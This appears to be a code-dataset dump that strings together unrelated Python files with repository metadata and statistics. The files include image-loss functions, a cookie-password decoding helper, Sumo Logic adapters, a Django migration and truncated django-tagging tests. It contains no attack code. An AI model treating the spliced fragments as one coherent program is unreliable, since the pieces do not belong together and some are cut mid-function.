y_pred = join_reim_mag_output(y_pred_image)
return -1 * \
tf.image.ssim_multiscale(y_true, y_pred, max_val=K.max(y_true))
return image_ssim_ms
def psnr(output_domain):
"""Specifies a function which computes the appropriate loss function.
Loss function here is PSNR on image-space data.
Args:
output_domain(str): Network output domain ('FREQ' or 'IMAGE')
Returns:
Function computing loss value from a true and predicted input
"""
if(output_domain == 'IMAGE'):
def image_psnr(y_true, y_pred):
y_true = join_reim_mag_output(y_true)
y_pred = join_reim_mag_output(y_pred)
return -1 * tf.image.psnr(y_true, y_pred, max_val=K.max(y_true))
return image_psnr
elif(output_domain == 'FREQ'):
def image_psnr(y_true, y_pred):
y_true_image = utils.convert_tensor_to_image_domain(y_true)
y_pred_image = utils.convert_tensor_to_image_domain(y_pred)
y_true = join_reim_mag_output(y_true_image)
y_pred = join_reim_mag_output(y_pred_image)
return -1 * tf.image.psnr(y_true, y_pred, max_val=K.max(y_true))
return image_psnr
| 36.883281
| 160
| 0.619398
| 1,681
| 11,692
| 3.986913
| 0.069601
| 0.081319
| 0.058192
| 0.096986
| 0.910773
| 0.908684
| 0.888988
| 0.872725
| 0.872725
| 0.84915
| 0
| 0.010262
| 0.291567
| 11,692
| 316
| 161
| 37
| 0.798865
| 0.242217
| 0
| 0.820225
| 0
| 0
| 0.013799
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.179775
| false
| 0.005618
| 0.033708
| 0.022472
| 0.455056
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5e9642b361200d7786935e1cc9e29af0d8b808ef
| 241
|
py
|
Python
|
zhixuewang/tools/cookies.py
|
lihaoze123/zhixuewang-python
|
7a54bb1ae96f74d3bb3a0845f3b084bb5942f758
|
[
"MIT"
] | 22
|
2019-01-21T03:49:44.000Z
|
2020-02-13T08:43:01.000Z
|
zhixuewang/tools/cookies.py
|
lihaoze123/zhixuewang-python
|
7a54bb1ae96f74d3bb3a0845f3b084bb5942f758
|
[
"MIT"
] | 10
|
2019-01-21T03:50:23.000Z
|
2020-01-03T13:06:49.000Z
|
zhixuewang/tools/cookies.py
|
lihaoze123/zhixuewang-python
|
7a54bb1ae96f74d3bb3a0845f3b084bb5942f758
|
[
"MIT"
] | 3
|
2019-02-17T06:12:35.000Z
|
2019-10-29T13:24:06.000Z
|
from zhixuewang.tools.password_helper import base64_decode
def get_password_from_session(session):
return base64_decode(session.cookies["pwd"])
def get_username_from_session(session):
return base64_decode(session.cookies["uname"])
| 30.125
| 58
| 0.817427
| 32
| 241
| 5.84375
| 0.5
| 0.192513
| 0.192513
| 0.256684
| 0.534759
| 0.534759
| 0.534759
| 0.534759
| 0
| 0
| 0
| 0.027397
| 0.091286
| 241
| 8
| 59
| 30.125
| 0.826484
| 0
| 0
| 0
| 0
| 0
| 0.033058
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0.4
| 0.2
| 0.4
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 7
|
5eb021c1324131eaf94afd6f99214149f48b2053
| 128
|
py
|
Python
|
encrypted_dns/resolve/__init__.py
|
zhenghaven/encrypted-dns
|
0efefa87309834cd536d59d3e082c084d94ae2fa
|
[
"Apache-2.0"
] | 33
|
2020-07-24T18:51:17.000Z
|
2021-06-10T03:06:36.000Z
|
encrypted_dns/resolve/__init__.py
|
zhenghaven/encrypted-dns
|
0efefa87309834cd536d59d3e082c084d94ae2fa
|
[
"Apache-2.0"
] | null | null | null |
encrypted_dns/resolve/__init__.py
|
zhenghaven/encrypted-dns
|
0efefa87309834cd536d59d3e082c084d94ae2fa
|
[
"Apache-2.0"
] | 4
|
2021-07-14T06:05:45.000Z
|
2022-03-01T05:47:10.000Z
|
from encrypted_dns.resolve.core import WireMessageHandler, OutboundHandler
from encrypted_dns.resolve.cache import CacheHandler
| 42.666667
| 74
| 0.890625
| 15
| 128
| 7.466667
| 0.666667
| 0.232143
| 0.285714
| 0.410714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.070313
| 128
| 2
| 75
| 64
| 0.941176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
5eb6ebc6a2e2e4af938da21c6ecf6ce9f2e94659
| 5,408
|
py
|
Python
|
modules/csiem_adapter.py
|
voltaire321/sumologictoolbox
|
548854f6e8586572bff2058f8c822f6485988ebe
|
[
"Apache-2.0"
] | 24
|
2015-12-10T21:18:13.000Z
|
2020-12-10T22:17:24.000Z
|
modules/csiem_adapter.py
|
voltaire321/sumologictoolbox
|
548854f6e8586572bff2058f8c822f6485988ebe
|
[
"Apache-2.0"
] | 8
|
2021-02-12T18:21:37.000Z
|
2022-03-17T04:25:54.000Z
|
modules/csiem_adapter.py
|
voltaire321/sumologictoolbox
|
548854f6e8586572bff2058f8c822f6485988ebe
|
[
"Apache-2.0"
] | 7
|
2015-12-08T00:09:14.000Z
|
2020-06-26T16:27:13.000Z
|
from modules.adapter import SumoAdapter
class SumoCustomInsightAdapter(SumoAdapter):
from modules.shared import import_custom_insight, export_custom_insight
def __init__(self, creds, side, mainwindow):
super(SumoCustomInsightAdapter, self).__init__(creds, side, mainwindow)
def list(self, params=None):
return self.sumo.get_custom_insights_sync()
def get(self, item_name, item_id, params=None):
try:
custom_insight = self.sumo.get_custom_insight(item_id)
return {'status': 'SUCCESS',
'adapter': self,
'payload': custom_insight,
'params': params}
except Exception as e:
raise e
def export_item(self, item_name, item_id, params=None):
try:
custom_insight = self.export_custom_insight(item_id, self.sumo)
return {'status': 'SUCCESS',
'adapter': self,
'payload': custom_insight,
'params': params}
except Exception as e:
raise e
def put(self, item_name, payload, params=None):
try:
result = self.import_custom_insight(payload, self.sumo)
return {'status': 'SUCCESS',
'result': result,
'adapter': self,
'params': params}
except Exception as e:
raise e
def import_item(self, item_name, payload, params=None):
return self.put(item_name, payload, params=params)
def delete(self, item_name, item_id, params=None):
try:
result = self.sumo.delete_custom_insight(item_id)
return {'status': 'SUCCESS',
'result': result,
'adapter': self,
'params': params}
except Exception as e:
raise e
class SumoRuleAdapter(SumoAdapter):
from modules.shared import import_rule, export_rule
def __init__(self, creds, side, mainwindow):
super(SumoRuleAdapter, self).__init__(creds, side, mainwindow)
def list(self, params=None):
if 'query' in params:
query = params['query']
else:
query = ''
return self.sumo.get_rules_sync(query)
def get(self, item_name, item_id, params=None):
try:
rule = self.export_rule(item_id, self.sumo)
return {'status': 'SUCCESS',
'adapter': self,
'payload': rule,
'params': params}
except Exception as e:
raise e
def export_item(self, item_name, item_id, params=None):
return self.get(item_name, item_id, params=params)
def put(self, item_name, payload, params=None):
try:
result = self.import_rule(payload, self.sumo)
return {'status': 'SUCCESS',
'result': result,
'adapter': self,
'params': params}
except Exception as e:
raise e
def import_item(self, item_name, payload, params=None):
return self.put(item_name, payload, params=params)
def delete(self, item_name, item_id, params=None):
try:
result = self.sumo.delete_rule(item_id)
return {'status': 'SUCCESS',
'result': result,
'adapter': self,
'params': params}
except Exception as e:
raise e
class SumoLogMappingAdapter(SumoAdapter):
from modules.shared import import_log_mapping, export_log_mapping
def __init__(self, creds, side, mainwindow):
super(SumoLogMappingAdapter, self).__init__(creds, side, mainwindow)
def list(self, params=None):
if 'query' in params:
query = params['query']
else:
query = ''
return self.sumo.get_log_mappings_sync(query)
def get(self, item_name, item_id, params=None):
try:
mapping = self.sumo.get_log_mapping(item_id)
return {'status': 'SUCCESS',
'adapter': self,
'payload': mapping,
'params': params}
except Exception as e:
raise e
def export_item(self, item_name, item_id, params=None):
try:
mapping = self.export_log_mapping(item_id, self.sumo)
return {'status': 'SUCCESS',
'adapter': self,
'payload': mapping,
'params': params}
except Exception as e:
raise e
def put(self, item_name, payload, params=None):
try:
result = self.import_log_mapping(payload, self.sumo)
return {'status': 'SUCCESS',
'result': result,
'adapter': self,
'params': params}
except Exception as e:
raise e
def import_item(self, item_name, payload, params=None):
return self.put(item_name, payload, params=params)
def delete(self, item_name, item_id, params=None):
try:
result = self.sumo.delete_log_mapping(item_id)
return {'status': 'SUCCESS',
'result': result,
'adapter': self,
'params': params}
except Exception as e:
raise e
| 32.97561
| 79
| 0.547892
| 572
| 5,408
| 4.991259
| 0.090909
| 0.05324
| 0.063047
| 0.104028
| 0.858494
| 0.851489
| 0.809457
| 0.756567
| 0.752364
| 0.752364
| 0
| 0
| 0.354105
| 5,408
| 164
| 80
| 32.97561
| 0.817349
| 0
| 0
| 0.80597
| 0
| 0
| 0.069699
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.156716
| false
| 0
| 0.074627
| 0.037313
| 0.38806
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0d6ef0b6f39a8f77b766371c7135529f7d1eca42
| 45
|
py
|
Python
|
floris/tools/optimization/__init__.py
|
jialrs/floris-enhanced
|
66cdf1c9597aa3bb4f956cc9a0cb497312a690bf
|
[
"Apache-2.0"
] | null | null | null |
floris/tools/optimization/__init__.py
|
jialrs/floris-enhanced
|
66cdf1c9597aa3bb4f956cc9a0cb497312a690bf
|
[
"Apache-2.0"
] | null | null | null |
floris/tools/optimization/__init__.py
|
jialrs/floris-enhanced
|
66cdf1c9597aa3bb4f956cc9a0cb497312a690bf
|
[
"Apache-2.0"
] | null | null | null |
from . import pyoptsparse
from . import scipy
| 22.5
| 25
| 0.8
| 6
| 45
| 6
| 0.666667
| 0.555556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.155556
| 45
| 2
| 26
| 22.5
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0d9afc668af8d1c368fefc3b0f0cdc578ff6b40a
| 1,685
|
py
|
Python
|
landavailability/api/migrations/0021_auto_20161216_1535.py
|
alphagov/land-avilability-api
|
048d4eed4caedb7b9f41caa5d69025506b2eb57d
|
[
"MIT"
] | 1
|
2017-07-24T17:00:34.000Z
|
2017-07-24T17:00:34.000Z
|
landavailability/api/migrations/0021_auto_20161216_1535.py
|
alphagov/land-availability-api
|
048d4eed4caedb7b9f41caa5d69025506b2eb57d
|
[
"MIT"
] | 23
|
2016-11-21T15:00:11.000Z
|
2019-06-04T07:07:55.000Z
|
landavailability/api/migrations/0021_auto_20161216_1535.py
|
alphagov/land-avilability-api
|
048d4eed4caedb7b9f41caa5d69025506b2eb57d
|
[
"MIT"
] | 4
|
2017-03-23T16:42:40.000Z
|
2021-12-01T07:27:30.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-12-16 15:35
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0020_auto_20161216_1524'),
]
operations = [
migrations.AlterField(
model_name='broadband',
name='avg_download_speed',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AlterField(
model_name='broadband',
name='avg_upload_speed',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AlterField(
model_name='broadband',
name='max_download_speed',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AlterField(
model_name='broadband',
name='max_upload_speed',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AlterField(
model_name='broadband',
name='min_download_speed',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AlterField(
model_name='broadband',
name='min_upload_speed',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AlterField(
model_name='broadband',
name='speed_30_mb_percentage',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
]
| 33.039216
| 81
| 0.605341
| 178
| 1,685
| 5.483146
| 0.303371
| 0.143443
| 0.179303
| 0.207992
| 0.78791
| 0.78791
| 0.78791
| 0.73873
| 0.73873
| 0.73873
| 0
| 0.040529
| 0.282493
| 1,685
| 50
| 82
| 33.7
| 0.766749
| 0.040356
| 0
| 0.651163
| 1
| 0
| 0.13197
| 0.027881
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.046512
| 0
| 0.116279
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0da9e54587bfc8c7f2ba5674a3c4b6d83df81fc6
| 121,423
|
py
|
Python
|
tagging/tests/tests.py
|
sinyawskiy/django-tagging
|
da00169d1e9be6b960842111ea0db2dced47cc3f
|
[
"BSD-3-Clause"
] | null | null | null |
tagging/tests/tests.py
|
sinyawskiy/django-tagging
|
da00169d1e9be6b960842111ea0db2dced47cc3f
|
[
"BSD-3-Clause"
] | null | null | null |
tagging/tests/tests.py
|
sinyawskiy/django-tagging
|
da00169d1e9be6b960842111ea0db2dced47cc3f
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
import sys, os
from django import forms
from django.db import models
from django.db.models import Q
from django.test import TestCase
from django.contrib.contenttypes.models import ContentType
from tagging.forms import TagAdminForm, TagField
from tagging import conf
from tagging.generic import fetch_content_objects
from tagging.models import Tag, TaggedItem
from tagging.tests.models import Article, Link, Perch, Parrot, FormTest, FormTestNull, DefaultNamespaceTest, DefaultNamespaceTest2, DefaultNamespaceTest3
from tagging.utils import calculate_cloud, check_tag_length, edit_string_for_tags, get_tag_list, get_tag_parts, get_tag, parse_tag_input, split_strip
from tagging.utils import LINEAR
#############
# Utilities #
#############
class TestParseTagInput(TestCase):
def test_with_simple_space_delimited_tags(self):
""" Test with simple space-delimited tags. """
self.assertEquals(parse_tag_input('one'), [u'one'])
self.assertEquals(parse_tag_input('one two'), [u'one', u'two'])
self.assertEquals(parse_tag_input('one two three'), [u'one', u'three', u'two'])
self.assertEquals(parse_tag_input('one one two two'), [u'one', u'two'])
self.assertEquals(parse_tag_input('first:one'), [u'first:one'])
self.assertEquals(parse_tag_input('first:one two'), [u'first:one', u'two'])
self.assertEquals(parse_tag_input('one= second:two :three'),
[u'one', u'second:two', u'three'])
self.assertEquals(parse_tag_input(':one= :two= =three:'),
[u'one', u'three', u'two'])
self.assertEquals(parse_tag_input('=one=two :three:four'),
[u'"three:four"', u'one=two'])
self.assertEquals(parse_tag_input(':=one:two=three=:'),
[u'"one:two"="three=:"'])
self.assertEquals(parse_tag_input('second:one first:one'),
[u'first:one', u'second:one'])
self.assertEquals(parse_tag_input('first:one first:two'),
[u'first:one', u'first:two'])
self.assertEquals(parse_tag_input('first:one first:one second:one'),
[u'first:one', u'second:one'])
self.assertEquals(parse_tag_input('one=two'), [u'one=two'])
self.assertEquals(parse_tag_input('three=four one=two'),
[u'one=two', u'three=four'])
self.assertEquals(parse_tag_input('one=two one=three'),
[u'one=three', u'one=two'])
self.assertEquals(parse_tag_input('first:one=two'), [u'first:one=two'])
self.assertEquals(parse_tag_input('second:one=three first:one=two'),
[u'first:one=two', u'second:one=three'])
self.assertEquals(parse_tag_input('first:one:two=three:four=five'),
[u'first:"one:two"="three:four=five"'])
def test_with_comma_delimited_multiple_words(self):
""" Test with comma-delimited multiple words.
An unquoted comma in the input will trigger this. """
self.assertEquals(parse_tag_input(',one'), [u'one'])
self.assertEquals(parse_tag_input(',one two'), [u'one two'])
self.assertEquals(parse_tag_input('one two,'), [u'one two'])
self.assertEquals(parse_tag_input(',one two three'), [u'one two three'])
self.assertEquals(parse_tag_input('one two three,'), [u'one two three'])
self.assertEquals(parse_tag_input('a-one, a-two and a-three'),
[u'a-one', u'a-two and a-three'])
self.assertEquals(parse_tag_input('a:one, a:two and a=three'),
[u'a:one', u'a:two and a=three'])
self.assertEquals(parse_tag_input('a:one, a:two and a:three'),
[u'a:"two and a:three"', u'a:one'])
self.assertEquals(parse_tag_input('a:one, a:one=two a:one=two'),
[u'a:one', u'a:one="two a:one=two"'])
def test_with_double_quoted_multiple_words(self):
""" Test with double-quoted multiple words.
A completed quote will trigger this. Unclosed quotes are ignored. """
self.assertEquals(parse_tag_input('"one'), [u'one'])
self.assertEquals(parse_tag_input('one"'), [u'one'])
self.assertEquals(parse_tag_input('"one two'), [u'one', u'two'])
self.assertEquals(parse_tag_input('"one two three'), [u'one', u'three', u'two'])
self.assertEquals(parse_tag_input('"one two"'), [u'one two'])
self.assertEquals(parse_tag_input('a-one "a-two and a-three"'),
[u'a-one', u'a-two and a-three'])
self.assertEquals(parse_tag_input('"one""two" "three"'), [u'onetwo', u'three'])
self.assertEquals(parse_tag_input('":one'), [u'one'])
self.assertEquals(parse_tag_input('one="'), [u'one'])
self.assertEquals(parse_tag_input('"one:two"'), [u'"one:two"'])
self.assertEquals(parse_tag_input('one:"two three"'), [u'one:two three'])
self.assertEquals(parse_tag_input('"one:"two"=three"'), [u'"one:two=three"'])
self.assertEquals(parse_tag_input('"one:"two"=three'), [u'"one:two"=three'])
self.assertEquals(parse_tag_input(':"=one":two=three=:'),
[u'"=one:two"="three=:"'])
def test_with_no_loose_commas(self):
""" Test with no loose commas -- split on spaces. """
self.assertEquals(parse_tag_input('one two "thr,ee"'), [u'one', u'thr,ee', u'two'])
self.assertEquals(parse_tag_input('one two:"thr,ee"'), [u'one', u'two:thr,ee'])
self.assertEquals(parse_tag_input('one:two three=four'), [u'one:two', u'three=four'])
def test_with_loose_commas(self):
""" Loose commas - split on commas """
self.assertEquals(parse_tag_input('"one", two three'), [u'one', u'two three'])
self.assertEquals(parse_tag_input('"one", two:three four=five'),
[u'one', u'two:three four=five'])
def test_tags_with_double_quotes_can_contain_commas(self):
""" Double quotes can contain commas """
self.assertEquals(parse_tag_input('a-one "a-two, and a-three"'),
[u'a-one', u'a-two, and a-three'])
self.assertEquals(parse_tag_input('"two", one, one, two, "one"'),
[u'one', u'two'])
def test_with_naughty_input(self):
""" Test with naughty input. """
# Bad users! Naughty users!
self.assertEquals(parse_tag_input(None), [])
self.assertEquals(parse_tag_input(''), [])
self.assertEquals(parse_tag_input('"'), [])
self.assertEquals(parse_tag_input('""'), [])
self.assertEquals(parse_tag_input('"' * 7), [])
self.assertEquals(parse_tag_input(',,,,,,'), [])
self.assertEquals(parse_tag_input('",",",",",",","'), [u','])
self.assertEquals(parse_tag_input(':'), [])
self.assertEquals(parse_tag_input(':::::::'), [u'"::::::"'])
self.assertEquals(parse_tag_input('='), [])
self.assertEquals(parse_tag_input('=' * 7), [])
self.assertEquals(parse_tag_input(':,:,=,=,:,=,:,='), [])
self.assertEquals(parse_tag_input(':= := =: =: : = = :'), [])
self.assertEquals(parse_tag_input('":":":":"="="=":"="'), [u'":":"::="="=:="'])
self.assertEquals(parse_tag_input('foo: =bar'), [u'bar', u'foo'])
self.assertEquals(parse_tag_input('a-one "a-two" and "a-three'),
[u'a-one', u'a-three', u'a-two', u'and'])
def test_with_asterisks(self):
self.assertEquals(parse_tag_input('*:foo bar=*'), [u'*:foo', u'bar=*'])
self.assertEquals(parse_tag_input('*'), ['*'])
self.assertEquals(parse_tag_input('foo:*=bar'), [u'foo:*=bar'])
self.assertEquals(parse_tag_input(':*:='), [u'"*:"'])
self.assertEquals(parse_tag_input('"*":foo bar="*"'), [u'*:foo', u'bar=*'])
self.assertEquals(parse_tag_input('"*"'), ['*'])
self.assertEquals(parse_tag_input('foo:"*"=bar'), [u'foo:*=bar'])
self.assertEquals(parse_tag_input(':"*":='), [u'"*:"'])
def test_keep_quotes(self):
self.assertEquals(parse_tag_input('*:foo bar=*', keep_quotes=['*']), [u'*:foo', u'bar=*'])
self.assertEquals(parse_tag_input('"*":foo bar=*', keep_quotes=['*']), [u'"*":foo', u'bar=*'])
self.assertEquals(parse_tag_input('"*":foo bar="*"', keep_quotes=['*']), [u'"*":foo', u'bar="*"'])
self.assertEquals(parse_tag_input('"*"', keep_quotes=['*']), ['"*"'])
self.assertEquals(parse_tag_input('*', keep_quotes=['*']), ['*'])
self.assertEquals(parse_tag_input('foo:*=bar', keep_quotes=['*']), [u'foo:*=bar'])
self.assertEquals(parse_tag_input('foo:"*"=bar', keep_quotes=['*']), [u'foo:"*"=bar'])
def test_default_namespace(self):
self.assertEquals(parse_tag_input('bar', default_namespace='foo'), [u'foo:bar'])
self.assertEquals(parse_tag_input('bar :bar', default_namespace='foo'), [u'bar', u'foo:bar'])
self.assertEquals(parse_tag_input('foo:bar bar', default_namespace='foo'), [u'foo:bar'])
self.assertEquals(parse_tag_input('bar=baz', default_namespace='foo'), [u'foo:bar=baz'])
self.assertEquals(parse_tag_input('bar=baz', default_namespace='col:on'), [u'"col:on":bar=baz'])
self.assertEquals(parse_tag_input('bar', default_namespace='foo'), [u'foo:bar'])
self.assertEquals(parse_tag_input('bar foo', default_namespace='foo'), [u'foo:bar', u'foo:foo'])
self.assertEquals(parse_tag_input('bar=foo', default_namespace='foo'), [u'foo:bar=foo'])
self.assertEquals(parse_tag_input(':bar', default_namespace='foo'), [u'bar'], [u'foo:bar'])
self.assertEquals(parse_tag_input('"":bar', default_namespace='foo'), [u'bar'], [u'foo:bar'])
self.assertEquals(parse_tag_input('space:bar foo=value', default_namespace='foo'), [u'foo:foo=value', u'space:bar'])
self.assertEquals(parse_tag_input('foo: foo:foo', default_namespace='foo'), [u'foo:foo'])
self.assertEquals(parse_tag_input('space:"bar foo"=value', default_namespace='foo'), [u'space:bar foo=value'])
self.assertEquals(parse_tag_input('space:bar foo=value, baz ter', default_namespace='foo'), [u'foo:baz ter', u'space:bar foo=value'])
self.assertEquals(parse_tag_input('foo bar', default_namespace='col:on'), [u'"col:on":bar', u'"col:on":foo'])
self.assertEquals(parse_tag_input('foo bar', default_namespace='spa ce'), [u'spa ce:bar', u'spa ce:foo'])
self.assertEquals(parse_tag_input('foo bar', default_namespace='equ=al'), [u'"equ=al":bar', u'"equ=al":foo'])
self.assertEquals(parse_tag_input(' ', default_namespace='equ=al'), [])
class TestSplitStrip(TestCase):
def test_with_empty_input(self):
self.assertEquals(split_strip(' foo '), [u'foo'])
self.assertEquals(split_strip(' foo , bar '), [u'foo', u'bar'])
self.assertEquals(split_strip(', foo , bar ,'), [u'foo', u'bar'])
self.assertEquals(split_strip(None), [])
def test_with_different_whitespace(self):
self.assertEquals(split_strip(' foo\t,\nbar '), [u'foo', u'bar'])
def test_with_athor_delimiter(self):
self.assertEquals(split_strip(' foo bar ', ' '), [u'foo', u'bar'])
def test_non_empty_input(self):
self.assertEquals(split_strip(''), [])
self.assertEquals(split_strip(None), [])
class TestNormalisedTagListInput(TestCase):
def setUp(self):
self.cheese = Tag.objects.create(name='cheese')
self.toast = Tag.objects.create(name='toast')
self.food_cheese = Tag.objects.create(namespace='food', name='cheese')
self.food_egg = Tag.objects.create(namespace='food', name='egg')
self.star_cheese_none = Tag.objects.create(namespace='*', name='cheese')
self.star_cheese_star = Tag.objects.create(namespace='*', name='cheese', value='*')
self.none_cheese_star = Tag.objects.create(name='cheese', value='*')
self.cheese_star_none = Tag.objects.create(namespace='cheese', name='*')
def test_single_tag_object_as_input(self):
self.assertEquals(get_tag_list(self.cheese), [self.cheese])
def test_single_string_as_input(self):
ret = get_tag_list('cheese')
self.assertEquals(len(ret), 1)
self.failUnless(self.cheese in ret)
ret = get_tag_list('food:egg')
self.assertEquals(len(ret), 1)
self.failUnless(self.food_egg in ret)
def test_space_delimeted_string_as_input(self):
ret = get_tag_list('cheese toast')
self.assertEquals(len(ret), 2)
self.failUnless(self.cheese in ret)
self.failUnless(self.toast in ret)
def test_comma_delimeted_string_as_input(self):
ret = get_tag_list('cheese,toast')
self.assertEquals(len(ret), 2)
self.failUnless(self.cheese in ret)
self.failUnless(self.toast in ret)
def test_namespaced_string_as_input(self):
ret = get_tag_list('cheese food:egg')
self.assertEquals(len(ret), 2)
self.failUnless(self.cheese in ret)
self.failUnless(self.food_egg in ret)
def test_invalid_string_as_input(self):
ret = get_tag_list('=')
self.assertEquals(len(ret), 0)
ret = get_tag_list(':')
self.assertEquals(len(ret), 0)
ret = get_tag_list('"":""=""')
self.assertEquals(len(ret), 0)
def test_list_of_invalid_string_as_input(self):
ret = get_tag_list([''])
self.assertEquals(len(ret), 0)
ret = get_tag_list(['='])
self.assertEquals(len(ret), 0)
ret = get_tag_list([':'])
self.assertEquals(len(ret), 0)
ret = get_tag_list(['"":""=""'])
self.assertEquals(len(ret), 0)
def test_with_empty_list(self):
self.assertEquals(get_tag_list([]), [])
def test_with_single_tag_instance(self):
ret = get_tag_list(self.cheese)
self.assertEquals(len(ret), 1)
self.failUnless(self.cheese in ret)
def test_list_of_two_strings(self):
ret = get_tag_list(['cheese', 'toast'])
self.assertEquals(len(ret), 2)
self.failUnless(self.cheese in ret)
self.failUnless(self.toast in ret)
ret = get_tag_list(['cheese', 'food:egg'])
self.assertEquals(len(ret), 2)
self.failUnless(self.cheese in ret)
self.failUnless(self.food_egg in ret)
def test_list_of_tag_primary_keys(self):
ret = get_tag_list([self.cheese.id, self.toast.id])
self.assertEquals(len(ret), 2)
self.failUnless(self.cheese in ret)
self.failUnless(self.toast in ret)
def test_list_of_strings_with_strange_nontag_string(self):
ret = get_tag_list(['cheese', 'toast', 'ŠĐĆŽćžšđ'])
self.assertEquals(len(ret), 2)
self.failUnless(self.cheese in ret)
self.failUnless(self.toast in ret)
def test_list_of_tag_instances(self):
ret = get_tag_list([self.cheese, self.toast])
self.assertEquals(len(ret), 2)
self.failUnless(self.cheese in ret)
self.failUnless(self.toast in ret)
def test_tuple_of_instances(self):
ret = get_tag_list((self.cheese, self.toast))
self.assertEquals(len(ret), 2)
self.failUnless(self.cheese in ret)
self.failUnless(self.toast in ret)
def test_with_tag_filter(self):
ret = get_tag_list(Tag.objects.filter(name__in=['cheese', 'toast']))
self.assertEquals(len(ret), 6)
self.failUnless(self.cheese in ret)
self.failUnless(self.food_cheese in ret)
self.failUnless(self.toast in ret)
self.failUnless(self.none_cheese_star in ret)
self.failUnless(self.star_cheese_star in ret)
self.failUnless(self.star_cheese_none in ret)
def test_with_invalid_input_mix_of_string_and_instance(self):
try:
get_tag_list(['cheese', self.toast])
except ValueError, ve:
self.assertEquals(str(ve),
'If a list or tuple of tags is provided, they must all be tag names, Tag objects or Tag ids.')
except Exception, e:
raise self.failureException('the wrong type of exception was raised: type [%s] value [%]' %\
(str(type(e)), str(e)))
else:
raise self.failureException('a ValueError exception was supposed to be raised!')
def test_with_invalid_input(self):
try:
get_tag_list(29)
except ValueError, ve:
self.assertEquals(str(ve), 'The tag input given was invalid.')
except Exception, e:
raise self.failureException('the wrong type of exception was raised: type [%s] value [%s]' %\
(str(type(e)), str(e)))
else:
raise self.failureException('a ValueError exception was supposed to be raised!')
def test_with_asterisks(self):
ret = get_tag_list('*:cheese')
self.assertEquals(len(ret), 1)
self.failUnless(self.star_cheese_none in ret)
ret = get_tag_list('cheese:*')
self.assertEquals(len(ret), 1)
self.failUnless(self.cheese_star_none in ret)
ret = get_tag_list('*:cheese=*')
self.assertEquals(len(ret), 1)
self.failUnless(self.star_cheese_star in ret)
ret = get_tag_list('cheese=*')
self.assertEquals(len(ret), 1)
self.failUnless(self.none_cheese_star in ret)
def test_with_wildcards(self):
ret = get_tag_list('*:cheese', wildcard='*')
self.assertEquals(len(ret), 3)
self.failUnless(self.star_cheese_none in ret)
self.failUnless(self.food_cheese in ret)
self.failUnless(self.cheese in ret)
ret = get_tag_list('cheese:*', wildcard='*')
self.assertEquals(len(ret), 1)
self.failUnless(self.cheese_star_none in ret)
ret = get_tag_list('*:cheese=*', wildcard='*')
self.assertEquals(len(ret), 5)
self.failUnless(self.star_cheese_none in ret)
self.failUnless(self.star_cheese_star in ret)
self.failUnless(self.none_cheese_star in ret)
self.failUnless(self.food_cheese in ret)
self.failUnless(self.cheese in ret)
# you can quote the wildcard
ret = get_tag_list('"*":cheese="*"', wildcard='*')
self.assertEquals(len(ret), 1)
self.failUnless(self.star_cheese_star in ret)
ret = get_tag_list('cheese=*', wildcard='*')
self.assertEquals(len(ret), 2)
self.failUnless(self.cheese in ret)
self.failUnless(self.none_cheese_star in ret)
# you can use any string as wildcard
